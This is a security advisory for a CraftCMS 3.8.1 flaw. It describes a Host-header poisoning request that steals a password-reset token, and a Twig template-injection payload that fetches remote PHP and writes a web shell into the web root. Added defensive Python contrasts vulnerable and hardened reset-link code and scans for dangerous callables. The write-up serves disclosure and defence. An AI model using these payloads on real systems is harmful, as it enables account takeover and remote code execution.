# Server-Side Template Injection on CraftCMS 3.8.1

**Exploit Author:** Tin Pham (aka TF1T) and Trong Pham (aka Dtro) of VietSunshine Cyber Security Services

**Vendor of Product:** CraftCMS

**Affected Product Code Base:** 3.8.1

**CVE:** CVE-2023-30130

**Summary**:

An issue in CraftCMS v3.8.1 allows a remote attacker to execute arbitrary code via a crafted Twig template in the Section settings (the entry type's Title Format). Editing sections requires a control-panel account with that permission, which is why the write-up first takes over an admin account through the password-reset flow.

1. Go to Settings -> Sections -> Edit entry types (or create a new section with the Single section type, then edit its entry types).
2. Inject malicious Twig into the Title Format; `file_get_contents` and `file_put_contents` are enough to drop a file into the web root and get RCE.

### **The story:**

CraftCMS is open source and has a bug bounty program on huntr.dev.

#### Bypass authentication

The password-reset flow is vulnerable to Host header poisoning. When an attacker submits the reset request with the Host header set to an attacker-controlled domain or IP, the host of the reset link emailed to the victim is replaced with that value. If the victim clicks the link, the reset token is sent to the attacker's server, so the attacker can set a new password and take over the account. The request needs only the CSRF token and session cookie that any visitor to the login page receives; no credentials are required.

RAW Request:

```
POST /craft_cms/web/index.php?p=admin/actions/users/send-password-reset-email HTTP/1.1
Host: 0ghrrr0ekjckhxqmm60dk5jy8peg2aqz.oastify.com
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/98.0.4758.85 Mobile/15E148 Safari/604.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: Y6gyOuBAHhUN0BJn5W6WctXfds2d00I4SfLo0EtZ9zxiu-TCgmjyCBrQfA6UBHAgQJtKHrJY4h6diACDrZsITDGejrwfML1oKYOvkrsGuEo=
X-Requested-With: XMLHttpRequest
Content-Length: 16
Connection: close
Cookie: CraftSessionId=v5vpt4j31f7kr23p4ocgfau5n7; CRAFT_CSRF_TOKEN=2a0c3da686a677780c906774b0e732c1c2986d722ad895d238ae0d5e45626b26a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A40%3A%22yxN4tDn5MKXyW6tlHWvN0HJtxlflTiJTK8KP9nJB%22%3B%7D

loginName=admin
```

<figure><img src="https://518888899-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfnmyxOyBvbgbc6H5GTuf%2Fuploads%2FMUn9f2afiEIu33WggHTR%2Fhead-host-poisoning.png?alt=media&#x26;token=0b55d8a4-55f0-49b8-82ba-8d0775741a98" alt=""><figcaption></figcaption></figure>
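The following Python is an added example, not Craft CMS code. It parses a raw request shaped like the one captured above and contrasts a reset link whose base URL is copied from the client-supplied Host header (the bug) with one built from a configured site URL behind a Host allow-list (in Craft terms: set the site URL / `@web` alias explicitly instead of letting it derive from the request, and reject unexpected hosts). The reset token, the set-password path, `craft.example` and the trusted-host set are constructed placeholders.

```python
"""Host header poisoning of a password-reset link: vulnerable vs hardened.

Added example, not Craft CMS code. Token, set-password path and the
configured hostnames are constructed placeholders.
"""
from __future__ import annotations

from typing import Dict, Optional, Tuple
from urllib.parse import urlencode

# Constructed copy of the captured request, reduced to the lines used here.
RAW_REQUEST = (
    "POST /craft_cms/web/index.php?p=admin/actions/users/send-password-reset-email HTTP/1.1\r\n"
    "Host: 0ghrrr0ekjckhxqmm60dk5jy8peg2aqz.oastify.com\r\n"
    "X-Requested-With: XMLHttpRequest\r\n"
    "\r\n"
    "loginName=admin"
)

# Placeholders standing in for a deployment's own configuration.
CONFIGURED_SITE_URL = "https://craft.example/craft_cms/web/"
TRUSTED_HOSTS = {"craft.example"}
RESET_TOKEN = "token-placeholder"


def parse_raw_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def reset_path(token: str) -> str:
    """Illustrative set-password path carrying the reset token (placeholder)."""
    return "index.php?" + urlencode({"p": "admin/set-password", "code": token})


def reset_link_vulnerable(headers: Dict[str, str], token: str) -> str:
    """Base URL derived from the request's Host header: whoever sends the
    reset request decides where the emailed link points."""
    return f"https://{headers['host']}/craft_cms/web/" + reset_path(token)


def reset_link_hardened(headers: Dict[str, str], token: str,
                        site_url: str = CONFIGURED_SITE_URL,
                        trusted_hosts: set[str] = TRUSTED_HOSTS) -> Optional[str]:
    """Base URL taken from configuration. The Host header is only checked
    against an allow-list, never copied into the link; None means refuse."""
    host = headers.get("host", "").rsplit(":", 1)[0].lower()  # drop :port
    if host not in trusted_hosts:
        return None
    return site_url + reset_path(token)


def demo() -> Dict[str, Optional[str]]:
    """Run both builders on the captured request and on a legitimate Host."""
    method, _target, headers, body = parse_raw_request(RAW_REQUEST)
    assert method == "POST" and body.startswith("loginName=")
    legit = {**headers, "host": "craft.example"}
    return {
        "vulnerable": reset_link_vulnerable(headers, RESET_TOKEN),
        "hardened": reset_link_hardened(headers, RESET_TOKEN),
        "hardened_legit": reset_link_hardened(legit, RESET_TOKEN),
    }


if __name__ == "__main__":
    for name, link in demo().items():
        print(f"{name:15} {link}")
```

Running it shows the vulnerable builder emitting a link on the oastify.com collaborator host, while the hardened builder refuses that request outright and only ever emits links on the configured site URL.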

#### RCE

In the control panel, several places accept template code from the user. One of them is reached by creating a new section with the Single section type.

<figure><img src="https://518888899-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfnmyxOyBvbgbc6H5GTuf%2Fuploads%2FWJ0PiFgR6yCPE1KE7Pca%2Fcreate_single_section.png?alt=media&#x26;token=196d2bcb-2e79-437e-8e50-0d1ee3bbde27" alt=""><figcaption></figcaption></figure>

We can inject a Twig template into the Title Format when editing this section's entry types.

<figure><img src="https://518888899-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfnmyxOyBvbgbc6H5GTuf%2Fuploads%2FmBtJtupxPhQO5wdumg5I%2Fedit_entry_type.png?alt=media&#x26;token=1fc2f80d-bbfe-455b-bb3b-b7a4dbb1e923" alt=""><figcaption><p>default Title Format</p></figcaption></figure>

Two PHP functions, `file_get_contents` and `file_put_contents`, are enough for RCE. Twig's `map` filter calls the given callable once per element with the element's value and key as its two arguments, so a one-element array mapped through `file_get_contents` fetches the remote PHP source, and a one-entry hash whose key is that source and whose value is the destination path, mapped through `file_put_contents`, writes it into the web root:

Payload:

```
{% set source=['https://raw.githubusercontent.com/trungtin1998/Scripts/master/PwnFunction.php']|map('file_get_contents')|join  %} {{{(source):"/var/www/html/shell.php"}|map("file_put_contents")|join()}}
```

<figure><img src="https://518888899-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfnmyxOyBvbgbc6H5GTuf%2Fuploads%2Fm2impa6yIaPzPpvkwzG7%2Fedit_entry_type_inject_ssti.png?alt=media&#x26;token=8d3e773c-7671-47bd-a82c-8cd38b3a1c96" alt=""><figcaption></figcaption></figure>
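For the defender's side, the following Python is an added example, not Craft CMS code. It assumes Craft 3 stores each entry type in `config/project/entryTypes/<uid>.yaml` with a `titleFormat` key (the same value lives in the `entrytypes` database table), and scans those values for the constructs the payload above relies on: callable-taking Twig filters (`map`, `filter`, `reduce`, `sort`) given a quoted PHP function name, references to file or process functions, and raw `{% %}` / `{{ }}` tags where a Title Format normally uses the `{field}` shorthand. The two YAML documents, the attacker URL and the section uid are constructed for the example.

```python
"""Audit entry-type Title Formats for injected Twig.

Added example, not Craft CMS code. Assumes the titleFormat key in
config/project/entryTypes/<uid>.yaml; sample YAML below is constructed.
"""
import re
from typing import List, Tuple

# PHP functions worth flagging when named inside a Title Format.
DANGEROUS_CALLABLES = {
    "file_get_contents", "file_put_contents", "system", "exec", "shell_exec",
    "passthru", "popen", "proc_open", "eval", "unserialize",
}
# Twig filters that accept a callable; a quoted name there is a PHP function.
CALLABLE_FILTER = re.compile(
    r"\|\s*(map|filter|reduce|sort)\s*\(\s*['\"]([A-Za-z_][\w\\]*)['\"]"
)
TWIG_TAG = re.compile(r"\{%|\{\{")
IDENT = re.compile(r"[A-Za-z_]\w*")
TITLE_FORMAT_LINE = re.compile(r"^\s*titleFormat:\s*(.*?)\s*$")

# Constructed sample: a legitimate Title Format using the {field} shorthand.
BENIGN_YAML = """\
handle: article
hasTitleField: false
name: Article
titleFormat: '{dateCreated|date(''Y-m-d'')} {title}'
"""

# Constructed sample: the payload shape from above (URL and uid are placeholders).
MALICIOUS_YAML = """\
handle: single
hasTitleField: false
name: Single
section: section-uid-placeholder
titleFormat: '{% set source=[''https://attacker.example/PwnFunction.php'']|map(''file_get_contents'')|join %} {{{(source):"/var/www/html/shell.php"}|map("file_put_contents")|join()}}'
"""


def unquote_yaml_scalar(raw: str) -> str:
    """Undo YAML single/double quoting for the simple scalars used here."""
    if len(raw) >= 2 and raw[0] == raw[-1] and raw[0] in "'\"":
        inner = raw[1:-1]
        return inner.replace("''", "'") if raw[0] == "'" else inner.replace('\\"', '"')
    return raw


def audit_title_format(value: str) -> List[str]:
    """Return findings for one Title Format; [] means nothing suspicious."""
    findings: List[str] = []
    reported = set()
    for filt, fn in CALLABLE_FILTER.findall(value):
        findings.append(f"high: |{filt}() called with string callable '{fn}'")
        reported.add(fn)
    for fn in sorted((set(IDENT.findall(value)) & DANGEROUS_CALLABLES) - reported):
        findings.append(f"high: references PHP function {fn}")
    if TWIG_TAG.search(value):
        findings.append("review: raw Twig tags ({% / {{) instead of {field} shorthand")
    return findings


def audit_project_config(yaml_text: str, path: str = "entryTypes/<uid>.yaml"
                         ) -> List[Tuple[str, int, str, List[str]]]:
    """Scan one entry-type YAML file; report (path, line, value, findings)."""
    hits = []
    for lineno, line in enumerate(yaml_text.splitlines(), 1):
        m = TITLE_FORMAT_LINE.match(line)
        if not m:
            continue
        value = unquote_yaml_scalar(m.group(1))
        if value in ("", "~", "null"):
            continue
        findings = audit_title_format(value)
        if findings:
            hits.append((path, lineno, value, findings))
    return hits


if __name__ == "__main__":
    for sample in (BENIGN_YAML, MALICIOUS_YAML):
        for path, lineno, value, findings in audit_project_config(sample):
            print(f"{path}:{lineno}: {value[:60]}...")
            for f in findings:
                print("   ", f)
```

`audit_title_format` works on any string, so the same check can be pointed at `SELECT titleFormat FROM entrytypes` output when project config is not in use. Because Craft turns the `{field}` shorthand into Twig anyway, `{foo|map('system')}` without any `{% %}` tag is just as dangerous as the payload above, which is why the scan keys on filters and function names rather than on brace style.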

Requesting /shell.php then executes commands:

<figure><img src="https://518888899-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfnmyxOyBvbgbc6H5GTuf%2Fuploads%2F5jfu9x7jkUvvO1WYjRvM%2Fwrite_shell.png?alt=media&#x26;token=9fa9edcc-5a4f-45ce-837f-59f811b5b615" alt=""><figcaption></figcaption></figure>

**Impact:** Remote code execution as the web server user (after account takeover via the poisoned reset link, or by any user allowed to edit sections).
